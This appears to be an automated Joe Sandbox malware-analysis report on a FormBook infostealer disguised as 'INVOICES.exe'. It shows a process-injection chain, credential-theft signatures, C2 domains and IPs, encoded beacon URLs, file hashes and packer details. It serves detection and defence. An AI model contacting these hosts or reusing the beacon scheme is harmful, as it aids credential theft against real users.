                Command and Control: 4 Ingress Tool Transfer | 1 Encrypted Channel | 4 Non-Application Layer Protocol | 4 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Encrypted for Impact | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement
                Behavior Graph ID: 1544728 | Sample: INVOICES.exe | Startdate: 29/10/2024 | Architecture: WINDOWS | Score: 100

                Start node: contacts www.68529.xyz, www.treatyourownhip.online and 18 other IPs or domains. Signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; Binary is likely a compiled AutoIt script file; 3 other signatures. www.68529.xyz: Performs DNS queries to domains with low reputation.
                INVOICES.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                  -> svchost.exe (started): Maps a DLL or memory area into another process
                    -> XORjEgwNIUb.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                      -> AtBroker.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        -> XORjEgwNIUb.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); contacts www.68529.xyz 107.163.130.253 (ports 49745, 49746, 49747; TAKE2US, United States), www.plyvik.info 67.223.117.142 (ports 49741, 49742, 49743; VIMRO-AS15189US, United States) and 11 other IPs or domains
                        -> firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                INVOICES.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject
                INVOICES.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
                https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                2q33e.top | 38.47.233.52 | true | false | | unknown
                treatyourownhip.online | 81.169.145.95 | true | false | | unknown
                loginov.enterprises | 3.33.130.190 | true | false | | unknown
                www.bulbulun.net | 95.216.25.89 | true | false | | unknown
                www.tangible.online | 13.248.169.48 | true | false | | unknown
                www.gold-rates.online | 199.59.243.227 | true | false | | unknown
                www.broork.sbs | 163.44.176.12 | true | false | | unknown
                www.68529.xyz | 107.163.130.253 | true | true | | unknown
                nutrigenfit.online | 195.110.124.133 | true | false | | unknown
                www.dpo-medicina.online | 194.58.112.174 | true | false | | unknown
                www.premium303max.rest | 45.79.252.94 | true | false | | unknown
                www.2925588.com | 103.71.154.12 | true | false | | unknown
                www.plyvik.info | 67.223.117.142 | true | false | | unknown
                smithsmobilewash.net | 3.33.130.190 | true | false | | unknown
                www.adsdomain-195.click | 199.59.243.227 | true | false | | unknown
                www.treatyourownhip.online | unknown | unknown | false | | unknown
                www.loginov.enterprises | unknown | unknown | false | | unknown
                www.smithsmobilewash.net | unknown | unknown | false | | unknown
                www.2q33e.top | unknown | unknown | false | | unknown
                www.nutrigenfit.online | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.nutrigenfit.online/uye5/ | false | | unknown
                http://www.nutrigenfit.online/uye5/?mRR=Vxudf0fHzLw84n3P&edD=75F1ULhw6FwEjpnDA0ShEFdlFdwdGFO+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rOrOasIwOIgL2b+vXbiOxUsIxCPoWDvEXykJs0FHlhf94g== | false | | unknown
                http://www.premium303max.rest/4sq5/ | false | | unknown
                http://www.broork.sbs/mivl/?edD=NCBdkbAo51Pk6OQCOHBLNPGGoFWb7jFDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK6r1gpJDlK+mMheAcqBYNXKJFvncR+Lje3KwNZ7V3SHyOg==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.plyvik.info/ak8m/ | false | | unknown
                http://www.gold-rates.online/026w/ | false | | unknown
                http://www.dpo-medicina.online/hzvv/?mRR=Vxudf0fHzLw84n3P&edD=rORncVVdvgzWlpxqVdy6wyOp/+Tf7AwoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQj9ydLcasKlfpoifhU3jpBZMJYPNfPfapl2Jiho/Qt0KOg== | false | | unknown
                http://www.2925588.com/1t94/ | false | | unknown
                http://www.adsdomain-195.click/xene/?mRR=Vxudf0fHzLw84n3P&edD=oQfmtMAR504qWoEoIiuXkIZ390sDtx871CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEvd3KGx73JHR40wuRl04yT55myu+mdIWD34OfxSC3JH3Pw== | false | | unknown
                http://www.treatyourownhip.online/pq4g/?mRR=Vxudf0fHzLw84n3P&edD=/x7ZrZ76GI+PVQICx+fJsRsDfPwUjqoVDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD5OWdqbGxCnsQwRTx3/JOzhGR6ZHHmQh6NCPA8f1t14f7g== | false | | unknown
                http://www.bulbulun.net/taxt/ | false | | unknown
                http://www.adsdomain-195.click/xene/ | false | | unknown
                http://www.broork.sbs/mivl/ | false | | unknown
                http://www.premium303max.rest/4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFEBF2GjT/+1q0RocL006XFUWck2TAJQGogQWHAk4IwcjPQ==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.2q33e.top/phwy/ | false | | unknown
                http://www.loginov.enterprises/b8ns/ | false | | unknown
                http://www.68529.xyz/2su7/ | false | | unknown
                http://www.tangible.online/5byq/ | false | | unknown
                http://www.2925588.com/1t94/?edD=gjMIJwSCW/9UgfmDC9v9JuEAXY9+Tk/wxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjZ5WYlhZ6IbItanfVRefUclVTIAe/3x+VFj+y2sVXiouoQ==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.loginov.enterprises/b8ns/?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.treatyourownhip.online/pq4g/ | false | | unknown
                http://www.68529.xyz/2su7/?edD=pamwepkWr5FhGLIp9e9dE5wxTwNKoV0OitnUuyON/V0YdhH090qorkisWAKc74xRI1QLgpFLJyIK92bUXzceQHZBiR72PVsC64CKK1bLyHz9EtZqc0FSRzmTtcqhmMmMlg==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.smithsmobilewash.net/trf9/ | false | | unknown
                http://www.plyvik.info/ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                http://www.bulbulun.net/taxt/?edD=r1Iubw6Wh8IGmXw0YJVaMoRCD3peRXEmz6ievL1zkHtXMQX/g3sK5IHJ6rQ7ggOc23QC6zmWJBnuHS8GGugfDzOdB1VYvGABqxLnspqtMyj1CdMgVpHhi3ZxRPJaa26iDA==&mRR=Vxudf0fHzLw84n3P | false | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://duckduckgo.com/chrome_newtab | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://duckduckgo.com/ac/?q= | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://reg.ru | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://www.reg.ru/domain/new/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_ | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://premium303max.rest/4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc | AtBroker.exe, 00000005.00000002.3881258314.00000000058DE000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003C3E000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
                https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl- | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://www.ecosia.org/newtab/ | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://www.reg.ru/dedicated/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_l | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://ac.ecosia.org/autocomplete?q= | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://www.google.com | AtBroker.exe, 00000005.00000002.3881258314.0000000005A70000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3883082226.0000000007710000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3881258314.0000000005296000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003DD0000.00000004.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.00000000035F6000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
                http://www.tangible.online | XORjEgwNIUb.exe, 00000006.00000002.3880793532.000000000556E000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
                https://www.reg.ru/whois/?check=&dname=www.dpo-medicina.online&amp;reg_source=parking_auto | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_lan | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://www.reg.ru/sozdanie-saita/ | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand= | AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | false | | unknown
                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs
                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                163.44.176.12
                                                                                                                                www.broork.sbsJapan7506INTERQGMOInternetIncJPfalse
                                                                                                                                13.248.169.48
                                                                                                                                www.tangible.onlineUnited States
                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                38.47.233.52
                                                                                                                                2q33e.topUnited States
                                                                                                                                174COGENT-174USfalse
                                                                                                                                199.59.243.227
                                                                                                                                www.gold-rates.onlineUnited States
                                                                                                                                395082BODIS-NJUSfalse
                                                                                                                                103.71.154.12
                                                                                                                                www.2925588.comHong Kong
                                                                                                                                132325LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHKfalse
                                                                                                                                107.163.130.253
                                                                                                                                www.68529.xyzUnited States
                                                                                                                                20248TAKE2UStrue
                                                                                                                                67.223.117.142
                                                                                                                                www.plyvik.infoUnited States
                                                                                                                                15189VIMRO-AS15189USfalse
                                                                                                                                45.79.252.94
                                                                                                                                www.premium303max.restUnited States
                                                                                                                                63949LINODE-APLinodeLLCUSfalse
                                                                                                                                81.169.145.95
                                                                                                                                treatyourownhip.onlineGermany
                                                                                                                                6724STRATOSTRATOAGDEfalse
                                                                                                                                195.110.124.133
                                                                                                                                nutrigenfit.onlineItaly
                                                                                                                                39729REGISTER-ASITfalse
                                                                                                                                95.216.25.89
                                                                                                                                www.bulbulun.netGermany
                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                194.58.112.174
                                                                                                                                www.dpo-medicina.onlineRussian Federation
                                                                                                                                197695AS-REGRUfalse
                                                                                                                                3.33.130.190
                                                                                                                                loginov.enterprisesUnited States
                                                                                                                                8987AMAZONEXPANSIONGBfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544728
Start date and time: 2024-10-29 16:52:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: INVOICES.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 47
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: INVOICES.exe
Time      Type             Description
11:54:29  API Interceptor  10569678x Sleep call for process: AtBroker.exe modified
                                                                                                                                http://scansourcce.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 199.59.243.205
                                                                                                                                mm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 199.59.243.227
                                                                                                                                Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 199.59.243.227
                                                                                                                                Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 199.59.243.227
                                                                                                                                COGENT-174US1.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                • 38.180.142.19
                                                                                                                                ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                                                • 38.180.142.19
                                                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 167.141.36.116
                                                                                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 38.148.77.12
                                                                                                                                la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 128.145.47.134
                                                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 154.62.137.97
                                                                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 204.157.178.232
                                                                                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 38.63.123.50
                                                                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 38.250.231.26
                                                                                                                                SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 154.23.184.218
                                                                                                                                No context
                                                                                                                                Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.1209886597424439
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                                MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                                SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                                SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                                SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):287232
                                                                                                                                Entropy (8bit):7.994680500900089
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:wftt3dtq1reqbUczd6MXEQvxc0HYxQ7h4he6wbJ6qBUKiV6:WrttUdTXEQvxjTmejlBUKK6
                                                                                                                                MD5:1A417BA73F30B448C473814D121AB7F2
                                                                                                                                SHA1:649BD864A35BD177C0C84D8C2EBD67D0958D1950
                                                                                                                                SHA-256:292410118C7D53672E6F4C012F0A22774A7F6D3CFFE8F1A59AA51D4C147B2EE1
                                                                                                                                SHA-512:678F461F365B060A4845E19E6075280BD3566D7BD3549A73D838758623E6A21026513FB78E72D88C7918A302C226340230F560D13DC2809852246832506B1558
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.k.c.7FKYk.F...z.W2...cZ;...Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY.UGOT*.ZF.^.q.G..../&).8&)V%P=.%*7]:3o8Ph&3_wX>.....8(+?.EYL.W1P7FKYJTN.gU/.{Q0.mW!.C...u:R.N....0P.Q...{/=..=%YjQ7.FKY3UGOZe.TF}V0PR..83UGOZ5HT.1U0[6MKYcQGOZ5HTF1W.C7FKI3UG/^5HT.1W!P7FIY3SGOZ5HTF7W1P7FKY35COZ7HTF1W1R7..Y3EGOJ5HTF!W1@7FKY3UWOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7Fe-V-3OZ5L.B1W!P7F.]3UWOZ5HTF1W1P7FKY.UG/Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ
                                                                                                                                Process:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):287232
                                                                                                                                Entropy (8bit):7.994680500900089
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:wftt3dtq1reqbUczd6MXEQvxc0HYxQ7h4he6wbJ6qBUKiV6:WrttUdTXEQvxjTmejlBUKK6
                                                                                                                                MD5:1A417BA73F30B448C473814D121AB7F2
                                                                                                                                SHA1:649BD864A35BD177C0C84D8C2EBD67D0958D1950
                                                                                                                                SHA-256:292410118C7D53672E6F4C012F0A22774A7F6D3CFFE8F1A59AA51D4C147B2EE1
                                                                                                                                SHA-512:678F461F365B060A4845E19E6075280BD3566D7BD3549A73D838758623E6A21026513FB78E72D88C7918A302C226340230F560D13DC2809852246832506B1558
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.k.c.7FKYk.F...z.W2...cZ;...Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY.UGOT*.ZF.^.q.G..../&).8&)V%P=.%*7]:3o8Ph&3_wX>.....8(+?.EYL.W1P7FKYJTN.gU/.{Q0.mW!.C...u:R.N....0P.Q...{/=..=%YjQ7.FKY3UGOZe.TF}V0PR..83UGOZ5HT.1U0[6MKYcQGOZ5HTF1W.C7FKI3UG/^5HT.1W!P7FIY3SGOZ5HTF7W1P7FKY35COZ7HTF1W1R7..Y3EGOJ5HTF!W1@7FKY3UWOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7Fe-V-3OZ5L.B1W!P7F.]3UWOZ5HTF1W1P7FKY.UG/Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Entropy (8bit):7.969114892132771
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                File name:INVOICES.exe
                                                                                                                                File size:700'416 bytes
                                                                                                                                MD5:90c8ef1083fbf63ae33f23d51513a611
                                                                                                                                SHA1:28513b7108e382d811902d22d3749568adf296eb
                                                                                                                                SHA256:bfd180717755dd026fcbc5b370cea34a1ed365deb5e512420b63a5382f111764
                                                                                                                                SHA512:cc6f2bf6239934f4166b5c093a2f4c9691527afdfe265cef167a7970a9b88b4107b210fe254d8161f67e2224fcba8cc955f43104dfd4dd87bd246d7b2794934f
                                                                                                                                SSDEEP:12288:DozGdX0M4ornOmZIzfMwHHQmRROXKsV2eyIXfsCaMm4iQpvJ35LqfIPSSXg:D4GHnhIzOa/ePECCihpLqAP6
                                                                                                                                TLSH:0FE423D5E0D1A19ED4A205F94C128D3B356FFD2DE5206C4BB2A77A08ED376428623C6E
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                                                Icon Hash:0847a5a9ad2d61b0
                                                                                                                                Entrypoint:0x52ca00
                                                                                                                                Entrypoint Section:UPX1
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x67202CA1 [Tue Oct 29 00:30:25 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:fc6683d30d9f25244a50fd5357825e79
                                                                                                                                Instruction
                                                                                                                                pushad
                                                                                                                                mov esi, 004D7000h
                                                                                                                                lea edi, dword ptr [esi-000D6000h]
                                                                                                                                push edi
                                                                                                                                jmp 00007F6A78FB4ECDh
                                                                                                                                nop
                                                                                                                                mov al, byte ptr [esi]
                                                                                                                                inc esi
                                                                                                                                mov byte ptr [edi], al
                                                                                                                                inc edi
                                                                                                                                add ebx, ebx
